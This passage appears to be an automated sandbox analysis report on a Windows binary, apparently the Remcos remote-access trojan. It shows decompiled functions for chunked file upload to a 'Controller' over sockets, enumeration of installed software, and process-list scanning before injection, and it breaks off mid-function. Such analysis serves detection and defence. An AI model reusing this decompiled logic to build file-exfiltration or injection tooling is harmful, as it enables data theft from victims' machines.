API String ID: 2719235668-0
Opcode ID: 2bc755c9c5e59163a0779145fe762f2319bac21e25305591fb0e396319f2ff0e
Instruction ID: 299e841659b0901725312e6fa91f2ef5258d01f1bffcbcc29a749bf83e43a251
Opcode Fuzzy Hash: 2bc755c9c5e59163a0779145fe762f2319bac21e25305591fb0e396319f2ff0e
Instruction Fuzzy Hash: 8AD127B1A007006BFF24BF759C4566B7BA8AF06324F15416FE901A7382EB7D99008B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00405FBB, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405FBB(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				int _t143;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				void* _t189;
				long _t197;
				signed int _t202;
				void* _t215;
				union _LARGE_INTEGER _t279;
				intOrPtr _t280;
				union _LARGE_INTEGER* _t294;
				void* _t296;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;

				_t277 = __edx;
				_v68 = __ecx;
				E0040484C(__ecx);
				_t301 = _t300 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t298 = _v68;
				E004048C2(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t296 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t309 = _t296 - 0xffffffff;
				if(_t296 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t296,  &_v80);
					_t202 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t202;
					_v32 = _t202;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040412C(0,  &_v112, _a4);
					_t119 = E00416D1F( &_v136,  &_v112);
					_t302 = _t301 - 0x18;
					_t279 = "Uploading file to Controller: ";
					E0040713C(0, _t302, _t279, _t296, __eflags, _t119);
					_t303 = _t302 - 0x14;
					E00401FCE(0, _t303, "[Info]");
					E00416673(0, _t296);
					_t304 = _t303 + 0x30;
					E00401F11();
					E00401E54();
					_v36 = 1;
					_v40 = 0;
					_t126 = E0044FC20(_v52, _v48, 0x186a0, 0);
					_t209 = _t279;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t279;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						E00404CC1(CloseHandle(_t296), _t298);
						_t197 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t280 = _v32;
									__eflags = _v20 - _t280;
									if(__eflags >= 0) {
										_t209 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t209;
											_v20 = _t280;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t209;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E0042EB84(_t209, _t280, _t298, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t296, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t305 = _t304 - 0x18;
										_t215 = _t304 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t296, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t305 = _t304 - 0x18;
											_t215 = _t304 - 0x18;
											_push("ReadFile error");
											L23:
											E00401FCE(0, _t215);
											E00401FCE(0, _t305 - 0x18, "[ERROR]");
											E00416673(0, _t296);
											E0042EB8D(_v12);
											_t143 = CloseHandle(_t296);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E0042EB8D(_v12);
												E00404CC1(CloseHandle(_t296), _t298);
												_t145 = 1;
												goto L25;
											} else {
												E0040412C(0,  &_v112, _a4);
												_t154 = E00401FF5(0,  &_v472, _t280, __eflags, _v12, _v24);
												_t304 = _t304 - 0x18;
												_t156 = E00416C44(0x46b218,  &_v448, _v88, _v84);
												_t157 = E00416C44(0x46b218,  &_v424, _v36, _v40);
												E00402E54(_t304, E00402ECA(0x46b218,  &_v136, E00402ECA(0x46b218,  &_v160, E00402ECA(0x46b218,  &_v184, E00402E54( &_v208, E00402ECA(0x46b218,  &_v232, E00402E54( &_v256, E00402ECA(0x46b218,  &_v280, E00402ECA(0x46b218,  &_v304, E00402ECA(0x46b218,  &_v328, E00402ECA(0x46b218,  &_v352, E00402ECA(0x46b218,  &_v376, E00416D80(0x46b218,  &_v400,  &_v112), __eflags, 0x46b218), __eflags,  &_a8), __eflags, 0x46b218), __eflags,  &_a32), __eflags, 0x46b218), _t157), __eflags, 0x46b218), _t156), __eflags, 0x46b218), __eflags,  &_a56), __eflags, 0x46b218), _t154);
												_t298 = _v68;
												_push(0x52);
												_t173 = E0040495D(0x46b218, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												E00401F11();
												_t189 = E00401E54();
												__eflags = 0x46b200 | _t173 == 0xffffffff;
												if((0x46b200 | _t173 == 0xffffffff) != 0) {
													E00404CC1(_t189, _t298);
													CloseHandle(_t296);
													E0042EB8D(_v12);
													_t197 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E0042EB8D(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t294 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t209 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t209;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t294;
									__eflags = _t294 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t209 - _v52;
							} while (_t209 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E00402036(0, _t301 - 0x18, _t277, _t309,  &_a8);
					_push(0x53);
					_t143 = E0040495D(0, 0x46b2c8, _t277, _t309);
					L24:
					E00404CC1(_t143, _t298);
					_t145 = 0;
					L25:
					_t197 = _t145;
				}
				L18:
				E00401F11();
				E00401F11();
				E00401F11();
				return _t197;
			}

0x00405fbb
0x00405fc7
0x00405fca
0x00405fcf
0x00405fd9
0x00405fda
0x00405fdb
0x00405fdc
0x00405fdd
0x00405fe2
0x00405fe9
0x00406003
0x0040600c
0x0040600e
0x00406011
0x00406035
0x0040603a
0x0040603d
0x00406043
0x00406046
0x0040604c
0x0040604f
0x00406055
0x00406058
0x0040605b
0x00406069
0x0040606e
0x00406071
0x00406079
0x0040607e
0x00406088
0x0040608d
0x00406092
0x0040609b
0x004060a3
0x004060ae
0x004060b9
0x004060bf
0x004060c7
0x004060c9
0x004060cc
0x004060cf
0x004060d1
0x004060d6
0x004060d9
0x004060dc
0x0040637d
0x00406386
0x0040638b
0x004060e2
0x004060e2
0x004060ed
0x004060f0
0x004060f6
0x004060f9
0x004060f9
0x004060fe
0x004060fe
0x004060fe
0x004060fe
0x00406101
0x00406104
0x00406106
0x00406109
0x0040610f
0x0040610f
0x00406111
0x00406114
0x0040610b
0x0040610b
0x0040610d
0x00000000
0x00000000
0x0040610d
0x00406109
0x00406117
0x00406118
0x0040611e
0x00406123
0x00406129
0x0040612d
0x00406133
0x00406135
0x004063f3
0x004063f6
0x004063f8
0x00000000
0x0040613b
0x00406148
0x0040614e
0x00406150
0x004063e7
0x004063ea
0x004063ec
0x004063fd
0x004063fd
0x0040640c
0x00406411
0x00406419
0x00406422
0x00000000
0x00406156
0x00406156
0x0040615a
0x004063ce
0x004063dd
0x004063e4
0x00000000
0x00406160
0x00406166
0x00406177
0x0040617c
0x00406199
0x004061ae
0x0040626d
0x00406272
0x00406276
0x0040627a
0x0040627f
0x0040628b
0x00406296
0x004062a1
0x004062ac
0x004062b7
0x004062c2
0x004062cd
0x004062d8
0x004062e3
0x004062ee
0x004062f9
0x00406304
0x0040630f
0x0040631a
0x00406325
0x0040632d
0x00406332
0x00406334
0x004063b2
0x004063b8
0x004063c1
0x004063c7
0x00000000
0x00000000
0x00000000
0x00406334
0x0040615a
0x00406150
0x00000000
0x00406336
0x00406339
0x0040633e
0x00406341
0x00406344
0x0040634b
0x0040634e
0x00406352
0x0040635a
0x0040635b
0x0040635e
0x00406360
0x00406363
0x00406366
0x00406369
0x00406369
0x00406372
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406374
0x00406374
0x00406374
0x00000000
0x004060e4
0x004060e4
0x004060e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004060e7
0x004060e2
0x00406013
0x0040601c
0x00406021
0x00406028
0x00406428
0x0040642a
0x0040642f
0x00406431
0x00406431
0x00406431
0x0040638d
0x00406390
0x00406398
0x004063a0
0x004063ad

APIs

Part of subcall function 004048C2: connect.WS2_32(FFFFFFFF,0046B120,00000010), ref: 004048DD

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406006
GetFileSizeEx.KERNEL32(00000000,?), ref: 0040603D
__aulldiv.LIBCMT ref: 004060BF
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 0040612D
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 00406148

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

Part of subcall function 00404CC1: closesocket.WS2_32(?), ref: 00404CC7

Strings

SetFilePointerEx error, xrefs: 004063F8
[Info], xrefs: 00406083
Uploading file to Controller: , xrefs: 00406071
[ERROR], xrefs: 00406407
ReadFile error, xrefs: 004063EC

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-2190262076
Opcode ID: b5e54bd3966d44f857c3c8d3f75da1ce7168e26dc64dd59242aa1bb2705f864e
Instruction ID: 23f71687b411b7c457441e10106f480115e7792be4841ba1cdad76a822c0f5e3
Opcode Fuzzy Hash: b5e54bd3966d44f857c3c8d3f75da1ce7168e26dc64dd59242aa1bb2705f864e
Instruction Fuzzy Hash: F5C199319001199BCB08EFA1DC92AEEB775EF44314F10417FE506762E2EB385E858B99

Uniqueness

Uniqueness Score: -1.00%

Function 00418518, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00418518(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46aeb4 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46aeb8);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46aeb0) == 0) {
							ShowWindow( *0x46aeb0, 9);
							SetForegroundWindow( *0x46aeb0);
						} else {
							ShowWindow( *0x46aeb0, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46aeb4, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}

0x00418520
0x00418523
0x004185f4
0x00418601
0x00418609
0x0041860f
0x00000000
0x0041860f
0x00418529
0x0041852e
0x004185dd
0x00000000
0x00000000
0x004185e6
0x004185ee
0x004185ee
0x00418539
0x00418549
0x0041854e
0x004185ab
0x004185c5
0x004185d1
0x004185ad
0x004185b5
0x004185b5
0x00000000
0x004185ab
0x00418553
0x00418572
0x0041857b
0x00418595
0x00000000
0x00418595
0x00418555
0x00418558
0x0041855b
0x00418560
0x00000000
0x00418563
0x0041853b
0x0041853e
0x00418541
0x00000000

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 00418563
GetCursorPos.USER32(?), ref: 00418572
SetForegroundWindow.USER32(?), ref: 0041857B
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00418595
Shell_NotifyIconA.SHELL32(00000002,0046AEB8), ref: 004185E6
ExitProcess.KERNEL32 ref: 004185EE
CreatePopupMenu.USER32 ref: 004185F4
AppendMenuA.USER32 ref: 00418609

Strings

Close, xrefs: 004185FA

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 4fb77995b9a110922d045bd44e19a65b8858b3978d6fc409f57cb6b2d5086f70
Instruction ID: ffde795ca16d1132046aed4237a3a6749db2abd86bd0217c8107b7763197691a
Opcode Fuzzy Hash: 4fb77995b9a110922d045bd44e19a65b8858b3978d6fc409f57cb6b2d5086f70
Instruction Fuzzy Hash: D521ED31144205BFDB154F64DE0DAAA3F76FB05702F04012AF905A41B1DBFAD9A0EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00417588, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00417588(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					E00401ED1(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E0041027F( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E0041027F( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E0041027F( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E0041027F( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E0041027F( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E0041027F( &_v88, _v8);
								__eflags = E00409A84();
								if(__eflags == 0) {
									E00403205(E00402F9A(_t129,  &_v208, E00402F9A(_t129,  &_v232, E00404303(_t129,  &_v256, E00402F9A(_t129,  &_v280, E00404303(_t129,  &_v304, E00402F9A(_t129,  &_v328, E00404303(_t129,  &_v352, E00402F9A(_t129,  &_v376, E00404303(_t129,  &_v400, E00402F9A(_t129,  &_v424, E00404303(_t129,  &_v448, E0040708E( &_v472,  &_v40, __eflags, 0x4649d4), __eflags,  &_v160), _t206, __eflags, 0x4649d4), __eflags,  &_v112), _t206, __eflags, 0x4649d4), __eflags,  &_v184), _t206, __eflags, 0x4649d4), __eflags,  &_v136), _t206, __eflags, 0x4649d4), __eflags,  &_v88), _t206, __eflags, 0x4649d4), _t206, __eflags, "\n"));
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
								}
								RegCloseKey(_v8);
								E00401E54();
								E00401E54();
								E00401E54();
								E00401E54();
								E00401E54();
								E00401E54();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E0040320E(_t129, _t207, __eflags,  &_v64);
					E00401E54();
				} else {
					E0040412C(__ebx, _t207, 0x464a0c);
				}
				return _t207;
			}

0x00417588
0x004175a8
0x004175b2
0x004175c8
0x004175cf
0x004175d1
0x004175db
0x004175dc
0x004175dd
0x004175de
0x004175df
0x004175e6
0x004175e7
0x0041785b
0x0041785e
0x00417864
0x00417869
0x00000000
0x00000000
0x004175ed
0x004175ef
0x00417841
0x00417841
0x00417841
0x00417842
0x004175f5
0x0041760a
0x00417610
0x00417612
0x00417623
0x00417631
0x00417638
0x00417646
0x0041764d
0x0041765b
0x00417662
0x0041766d
0x00417674
0x0041767f
0x00417686
0x00417694
0x00417696
0x00417776
0x00417781
0x0041778c
0x00417797
0x004177a2
0x004177ad
0x004177b8
0x004177c3
0x004177ce
0x004177d9
0x004177e4
0x004177ef
0x004177fa
0x004177fa
0x00417802
0x0041780b
0x00417813
0x0041781e
0x00417829
0x00417834
0x0041783c
0x00000000
0x0041783c
0x00417612
0x00417849
0x0041784b
0x0041784c
0x0041784d
0x0041784e
0x00417852
0x00417859
0x0041785a
0x0041785a
0x00417872
0x0041787e
0x00417886
0x004175b4
0x004175bb
0x004175bb
0x00417892

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004175AA
RegEnumKeyExA.ADVAPI32 ref: 0041785E
RegCloseKey.ADVAPI32(?), ref: 00417872

Strings

UninstallString, xrefs: 0041767F
DisplayName, xrefs: 0041761E
Publisher, xrefs: 00417631
InstallLocation, xrefs: 0041765B
InstallDate, xrefs: 0041766D
DisplayVersion, xrefs: 00417646
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041759E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 34e9afbdd39b0fff1d1dbe3c9b6c70a57ee818e50b2e310ab6d9b8310f5d03c3
Instruction ID: 212f202d844bce9ff3fa0b6559e9411cee510b5ec1a0668da4ade9d817a52ee2
Opcode Fuzzy Hash: 34e9afbdd39b0fff1d1dbe3c9b6c70a57ee818e50b2e310ab6d9b8310f5d03c3
Instruction Fuzzy Hash: F5815F719001199ADB14FB61DD56AEEB378AF50704F1041AFE91AB20E1EF786F88CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00447C26, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00447C26(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x469188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0043E9A5(_t46);
							E00446E62( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0043E9A5(_t47);
							E0044731C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0043E9A5( *((intOrPtr*)(_t74 + 0x7c)));
						E0043E9A5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0043E9A5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0043E9A5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0043E9A5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0043E9A5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00447D99( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x4692a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0043E9A5(_t31);
							E0043E9A5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0043E9A5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0043E9A5(_t74);
			}

0x00447c2e
0x00447c32
0x00447c3a
0x00447c43
0x00447c48
0x00447c4f
0x00447c57
0x00447c5f
0x00447c6a
0x00447c70
0x00447c71
0x00447c79
0x00447c81
0x00447c8c
0x00447c92
0x00447c96
0x00447ca1
0x00447ca7
0x00447c48
0x00447ca8
0x00447cb0
0x00447cc3
0x00447cd6
0x00447ce4
0x00447cef
0x00447cf4
0x00447cfd
0x00447d05
0x00447d06
0x00447d06
0x00447d0c
0x00447d0f
0x00447d0f
0x00447d12
0x00447d19
0x00447d1b
0x00447d1f
0x00447d27
0x00447d2e
0x00447d34
0x00447d35
0x00447d35
0x00447d3c
0x00447d3e
0x00447d43
0x00447d4b
0x00447d50
0x00447d51
0x00447d51
0x00447d54
0x00447d57
0x00447d5a
0x00447d5d
0x00447d5d
0x00447d6f

APIs

___free_lconv_mon.LIBCMT ref: 00447C6A

Part of subcall function 00446E62: _free.LIBCMT ref: 00446E7F
Part of subcall function 00446E62: _free.LIBCMT ref: 00446E91
Part of subcall function 00446E62: _free.LIBCMT ref: 00446EA3
Part of subcall function 00446E62: _free.LIBCMT ref: 00446EB5
Part of subcall function 00446E62: _free.LIBCMT ref: 00446EC7
Part of subcall function 00446E62: _free.LIBCMT ref: 00446ED9
Part of subcall function 00446E62: _free.LIBCMT ref: 00446EEB
Part of subcall function 00446E62: _free.LIBCMT ref: 00446EFD
Part of subcall function 00446E62: _free.LIBCMT ref: 00446F0F
Part of subcall function 00446E62: _free.LIBCMT ref: 00446F21
Part of subcall function 00446E62: _free.LIBCMT ref: 00446F33
Part of subcall function 00446E62: _free.LIBCMT ref: 00446F45
Part of subcall function 00446E62: _free.LIBCMT ref: 00446F57

_free.LIBCMT ref: 00447C5F

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

_free.LIBCMT ref: 00447C81
_free.LIBCMT ref: 00447C96
_free.LIBCMT ref: 00447CA1
_free.LIBCMT ref: 00447CC3
_free.LIBCMT ref: 00447CD6
_free.LIBCMT ref: 00447CE4
_free.LIBCMT ref: 00447CEF
_free.LIBCMT ref: 00447D27
_free.LIBCMT ref: 00447D2E
_free.LIBCMT ref: 00447D4B
_free.LIBCMT ref: 00447D63

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9c912a9613ae6ad1ea7924e908149ac88524d1d6efd8e607ad26cae535d1d8ab
Instruction ID: ff0209ec5f6f0de76785425c0726118f7166ff11469a697a1482693085777aa0
Opcode Fuzzy Hash: 9c912a9613ae6ad1ea7924e908149ac88524d1d6efd8e607ad26cae535d1d8ab
Instruction Fuzzy Hash: 99317CB16082019FFF21AA3AD885B6B73F8AF45324F10442FE448D7291DF39AC419719

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFD5, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040CFD5(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00407320("1") != 0) {
					L14:
					E00401E5E( &_a4, _t149, _t159, E0041680D(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					E00401E54();
					if(E00416F93(_t111) != 0) {
						_push(_t111);
						if(E0040D677( &_a4, L"Program Files\\") != 0xffffffff) {
							E0040D697(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(E0040ECA0( &_v1204,  &_a4) != 0) {
						L22:
						E00401E54();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E0040201F(_t106,  &_v96);
						E0041735B(E00401E4F(0x46b4e0),  &_v96);
						E00401EF9( &_v96);
						if(E00413DBB(E00401E4F( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E00410470(0x46b4f8, E00401EF9(0x46b4f8), "Inj", 1);
						}
						E00401F11();
						goto L22;
					}
				}
				E00401ED1(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0040412C(_t106,  &_v56,  &_v648);
					_t157 = E00402254( &_v56,  &_v60);
					_t159 = E00402217( &_v56,  &_v64);
					E00407DEE( &_v72,  *((intOrPtr*)(E00402254( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(E0040ECAF( &_a4) != 0) {
						E00401E5E( &_v32, _v676, _t159, E00416FF7( &_v120, _v676));
						E00401E54();
						if(E00407320( &_v1204) == 0) {
							_t149 = 0x464a0c;
							if(E00407320(0x464a0c) != 0 || E00416FC1(_v676) != 0) {
								E00401E54();
								L13:
								E00401E54();
								goto L14;
							} else {
								E00409AE5( &_v32);
								E00401E54();
								break;
							}
						}
						E00401E54();
						E00401E54();
						goto L22;
					}
					E00401E54();
				}
				CloseHandle(_v8);
				_t149 = 0x464a0c;
				if(E00407320(0x464a0c) != 0) {
					goto L13;
				}
				E00401E54();
				goto L18;
			}

0x0040cfed
0x0040cff0
0x0040cff6
0x0040d005
0x0040d166
0x0040d172
0x0040d177
